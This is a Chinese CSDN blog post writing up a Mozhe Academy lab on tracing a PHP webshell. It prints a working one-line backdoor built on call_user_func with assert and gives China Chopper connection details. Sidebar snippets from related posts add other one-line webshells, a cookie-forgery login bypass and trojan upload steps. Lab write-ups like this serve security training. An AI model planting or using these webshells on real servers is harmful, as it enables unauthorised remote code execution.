墨者学院 - WebShell代码分析溯源(第5题)

最新推荐文章于 2021-12-29 20:32:27 发布
最新推荐文章于 2021-12-29 20:32:27 发布
阅读量815 收藏 2
点赞数
分类专栏: webshell Mozhe
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42357070/article/details/81364811
版权
 一个个看,,,找到该文件,经典的回调函数形式菜刀连接,ip/www/Exception.php?POST=assert密码为assert得到key关于回调函数可参考此文章https://blog.csdn.net/qq_24196029/article/details/78118680  <?phperror_reporting(0);call...
摘要由CSDN通过智能技术生成

 

一个个看,,,找到该文件,经典的回调函数形式

菜刀连接,
ip/www/Exception.php?POST=assert
密码为assert


得到key

关于回调函数可参考此文章

https://blog.csdn.net/qq_24196029/article/details/78118680

 

 

<?php
error_reporting(0);
call_user_func('assert', $_REQUEST['joker']);
?>

用法: http://www.xxx.com/4.php

菜刀连接用法: http://www.xxx.com/4.php

密码:joker

详解:call_user_func()函数把第一个参数作为回调函数调用,也就是说assert是被调用的回调函数,其余参数是回调函数的参数。

这样的话就直接构成了  assert($_REQUEST['joker']) 这样的一句话木马,直接用菜刀链接即可

多崎巡礼
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
360众测靶场库之28-CMS系统漏洞分析溯源(第5)
zjl12344的博客
03-07 280
360众测靶场
墨者学院 - WebShell代码分析溯源(第4)
多崎巡礼的博客
08-02 670
唉让我如此信任的工具在这道上栽了跟头。。。嗯,以后的结果仅供参考。   下载源代码,在hack文件夹下发现bin.php 打开分析代码得知其为php回调函数类一句话木马 且获得其密码,通过菜刀连接 菜刀连接http://219.153.49.228:42394/www/hack/bin.php?e=YXNzZXJ0 密码为POST array_filter()函数用回调函数过...
WebShell文件上传漏洞分析溯源
02-22
WebShell文件上传漏洞
墨者学院-WebShell代码分析溯源(第5)
JimWu的博客
09-04 341
WebShell代码分析溯源(第5) 难易程度:★★ 目类型:代码审计 使用工具:FireFox浏览器、Adobe Dreamweaver CS6、菜刀 1.访问网页,下载网页源代码。 2.审查php文件后发现了一个疑似木马的文件Exception.php。 3.打开文件,分析代码,有点像一句话木马。 分析后,发现call_user_func属于回调函数,第一个参数为函数,第二个参数作为回...
墨者 - WebShell代码分析溯源(第5)
吃肉唐僧的博客
07-12 217
下载文件后,发现木马文件 发现类似木马的语句 查看php手册:https://php.net/manual/zh/function.call-user-func.php 解释写着第一个参数callback是被调用的回调函数,其余参数是回调函数的参数。 就是说构成assert($REQUEST['assert']),密码为assert 直接菜刀无惧链接 拿到ke...
墨者WebShell文件上传漏洞分析溯源(第5)
zr1213159840的博客
12-29 516
点击访问后台,能找到一个后台登录的页面 这个地方可以输入几个密码试试,发现是账号以及密码都是admin。(其实应该爆破的,爆破方法另写一篇)使用admin登录后进入后台 点开文章管理,点击添加文章 能从页面上看出来,这是一个asp的页面,我们上传一个asp木马。但是我们首先将其命名为xxx.jpg,然后点击提交后,能看到上传的位置: 记住这段位置,点击数据备份 点击备份数据 能看到这个位置,我们使用蚁剑访问 翻到如图位置,拿到key ...
墨者学院 - WebShell代码分析溯源(第1)
多崎巡礼的博客
07-27 1251
下载源码 使用seay源代码审计系统扫一扫(实在不想一个个去看。。。) seay源代码审计系统:https://pan.baidu.com/s/1UhIqGc_wYfelqN47Tn_Qjg     下载出源代码,找到cn-right.php   &lt;?php error_reporting(0); $_GET['POST']($_POST['GET']); ?&gt; ...
墨者学院-HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2)
最新发布
05-29
HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2)、phpMyAdmin后台文件包含分析溯源、PHP代码分析溯源(第1)、PHP代码分析溯源(第2)、PHP逻辑漏洞利用实战(第1)、SQL手工注入漏洞测试(Access数据库)
APP原型实例:墨者科技-旅行小蜜APP2.0.rp
12-17
产品经理
0080 APP原型实例:墨者科技-旅行小蜜APP2.0.rp
01-06
rp原型源文件
将文件进行zip压缩并base64加密和解密
10-27
对文件进行zip压缩 和base64加密和解密的几个工具类
第30天:WEB漏洞-RCE代码及命令执行漏洞全解1
08-03
3. **检测**:通过静态代码分析、动态运行时检测和漏洞扫描工具,可以发现潜在的代码执行风险。 4. **危害**:攻击者可以通过RCE漏洞执行任意命令,获取敏感信息,篡改数据,甚至完全控制服务器。 5. **修复**:最佳...
墨者学院 - CMS系统漏洞分析溯源(第5)
多崎巡礼的博客
10-29 1599
phpecms1.3 cookies欺骗漏洞进后台 phpecms1.3/admin/cms_check.php &lt;?php if(!isset($_COOKIE['admin_name'])){ alert_href('非法登录','cms_login.php'); }; ?&gt;   判断如果没有admin_na...
WebShell代码分析溯源(第1)墨者学院
weixin_34161032的博客
01-10 223
一、访问链接 二、下载系统源码后直接放到D盾里扫描,扫到后门文件 三、查看该木马文件 <?phperror_reporting(0);$_GET['POST']($_POST['GET']);?> 1.error_reporting(0); 关闭错误报告 2.$_GET['POST']($_POST['GET']); 一句话木马,GET传...
墨者靶场 中级:CMS系统漏洞分析溯源(第5
qq_43233085的博客
01-18 623
墨者靶场 中级:CMS系统漏洞分析溯源(第5目背景介绍实训目标解方向解步骤 目 背景介绍 某日工程师发现一网站后台,苦苦尝试密码,一直未能登录,请你帮工程师想想办法。 实训目标 1、了解cookie的含义; 2、知晓常见验证方式; 3、熟练使用burp; 解方向 不一定非要知道密码才能登录哦。 解步骤 启动靶机,访问链接。 有目可知方向是cookie修改登录,使用工具扫出后台...
墨者学院-WebShell代码分析溯源(第1)
JimWu的博客
09-04 234
WebShell代码分析溯源(第1) 难易程度:★ 目类型:代码审计 使用工具:FireFox浏览器、记事本、菜刀 1.打开靶场,下载网页源代码。 2.打开文件夹,寻找可疑的文件,发现可疑文件cn-right.php。 打开发现,典型的一句话木马。 3.打开菜刀,尝试连接。 url为http://219.153.49.228:43269/www/cn-right.php?POST=asser...
墨者学院-CMS系统漏洞分析溯源(第5)
ST0new的博客
09-06 508
墨者学院 CMS漏洞 CMS系统漏洞分析溯源(第5) 说明: 本环境属于靶场环境,不属于真实环境,请不要将其用于非法环境 访问主页 然后访问admin 跳转到后台登录地址 admin/cms_login.php 后台绕过 查询发现1.3版本存在后台绕过漏洞 通过cookies欺骗进去后台,可以看到 <?php if(!isset($_COOKIE['adm...
CMS系统漏洞分析溯源(第5)
cc_de_csdn的博客
08-25 354
1.由提示可以知道本需要我们不使用密码登录 2.打开靶场,使用御剑扫描,发现一个/admin/的后台地址页面 3.通过资料了解到这个php通过校验访问的cookie,使用cookie edit修改cookie,添加admin_name,value随意 4.访问/admin/cms_admin.php,进入后台 5.拉倒网页最下面拿到KEY ...
墨者学院 - WebShell代码分析溯源(第2)
多崎巡礼的博客
07-31 744
&lt;?php  $POST['POST']='assert'; $array[]=$POST; $array[0]['POST']($_POST['assert']) ;?&gt; assert,是php代码执行函数,与eval()有同样的功能,assert()函数中参数为表达式 (或者为函数) 因为$array[], POST[]都是数组,所以$array[]=$POST,就是...
墨者学院sql注入 x-f
07-27
墨者学院SQL注入是一种常见的Web应用程序安全漏洞,攻击者通过在输入字段中插入恶意的SQL代码来实现对数据库的非授权访问。X-F是HTTP请求头部的一个字段,通常用于传递客户端IP地址或其他相关信息。在某些情况下,攻击者可能会尝试利用X-F字段进行SQL注入攻击。为了防止SQL注入攻击,开发人员应该合理地验证和过滤用户输入,并使用参数化查询或预编译语句来防止SQL注入攻击。此外,最好避免将用户输入直接拼接到SQL查询中。墨者学院可能提供相关的课程或教程来帮助开发人员学习和理解如何防止SQL注入攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值